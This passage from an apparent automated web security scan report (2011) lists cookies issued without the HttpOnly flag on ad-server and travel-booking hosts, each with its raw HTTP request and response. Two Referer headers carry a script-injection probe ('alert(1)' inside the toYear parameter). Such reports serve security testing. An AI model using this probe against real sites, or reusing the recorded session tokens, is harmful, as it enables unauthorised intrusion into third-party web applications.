Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe2() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...
14.7. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd&returnDate=yyyyc880d& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=EFC80F94270639BE94C078280756EC4C.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5024

function Miwe0() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDw
...[SNIP]...
14.8. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:48 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 51092

function DrfUtils() {}

DrfUtils.regexEscape = function(text) {
return text.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, "\\$&");
}
DrfUtils.isFFCompat = function() {
   if (document.addEventListener)
...[SNIP]...
14.9. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=363DEDDF73A993F4C60B78F29DDE0D70.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:48 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 473

DrfCalendar.i18n = {
   shortDayNames: [ "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"],
   dayNames: ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"],
   monthNames: ["Ja
...[SNIP]...
14.10. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=C0501070F6ED78D85CD7AA691728D8A2.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 1995

.drf-aa {background-position:-90px 0px;}
.drf-aavaca {background-position:-180px 0px;}
.drf-agoda {background-position:-270px 0px;}
.drf-aircanada {background-position:-360px 0px;}
.drf-airfare {b
...[SNIP]...
14.11. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD319AB033A4436E8A201300E0F85D78.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Content-Length: 95623
Connection: close
Content-Type: image/png

.PNG
.
...IHDR................-...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.12. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E7500CA14FDE215C024D31D0E17145B0.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=C48818E7B47F8EDDDEDEE13932368B50.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Content-Length: 1291
Connection: close
Content-Type: image/gif

GIF89a|.......A#.2..............K8....=8. ..6..+..*.....%..=..I.."..XQ.@;.).,.......K1.)    .    .....~m.9 .!..2..9..:..J8.B@.E).9..?".;&.B%.;..#........ ..!.....5..I&.3..D&.9%.=%.+..=........I(.&........
...[SNIP]...
14.13. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=42D836FDA1F37A442DDD521D91ED4575.p0529

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=E7500CA14FDE215C024D31D0E17145B0.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 513


function setupLargeBottomHPU(drfAd) {    
   var advertiserRenderer = new AdvertiserRenderer(drfAd);
   var configurer = new WidgetInitializer(drfAd, advertiserRenderer);
   configurer.setup(9, 742, "TVLY
...[SNIP]...
14.14. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=96CD86B744253E4B0A2E3CFE8BABE276.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=C1A177F6DDA538A9AC81F0BDDD440587.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 6336

#drf_popunderHPU {
   color: #000000;
   background-color: #f3ae07;
   background: #ffffff;
   width: 300px;
   height:600px;
   font-family: calibri, arial, sans-serif;
   text-align: left;
   font-size: 13p
...[SNIP]...
14.15. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C48818E7B47F8EDDDEDEE13932368B50.p0527

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 13952


function WidgetInitializer(drfAd, advertiserRenderer) {
   this.drfAd = drfAd;
   this.advertiserRenderer = advertiserRenderer;
}

WidgetInitializer.prototype.setup = function (advertisersNumber, w
...[SNIP]...
14.16. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-0666653885873574%26output%3Dhtml%26h%3D250%26slotname%3D7372794801%26w%3D300%26ea%3D0%26flash%3D10.3.183%26url%3Dhttp%253A%252F%252Fads.pubmatic.com%252Fhosteddefaulttags%252F26620%252F26621%252F21556%252F559%252Fadtag.html%26dt%3D1317606797018%26bpp%3D7%26shv%3Dr20110921%26jsv%3Dr20110914%26correlator%3D1317606797027%26frm%3D8%26adk%3D4114293891%26ga_vid%3D1069027809.1317606797%26ga_sid%3D1317606797%26ga_hid%3D1887245699%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D8%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D23%26u_nmime%3D106%26dff%3Dtimes%2520new%2520roman%26dfs%3D16%26adx%3D0%26ady%3D0%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D2019610879%26loc%3Dhttp%253A%252F%252Fads.pubmatic.com%252FHostedDefaultTags%252F26620%252F26621%252F21556%252F559%252Fadtag.html%26prodhost%3Dgoogleads.g.doubleclick.net%26fu%3D0%26ifi%3D1%26dtd%3D12&uid=eaa3bCBGoZRHY9Na_666924&xy=0%2C0&wh=300%2C250&vchannel=117962&iad=1317606801324-71110734669491650&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4248078B31C79B97218C3D4E49B5174D; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 03 Oct 2011 01:53:15 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("eaa3bCBGoZRHY9Na_666924");
14.17. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=425A3F0D7D8F379F923F9D8944F00D2B; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:20 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
14.18. http://go.americanexpress-travel.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
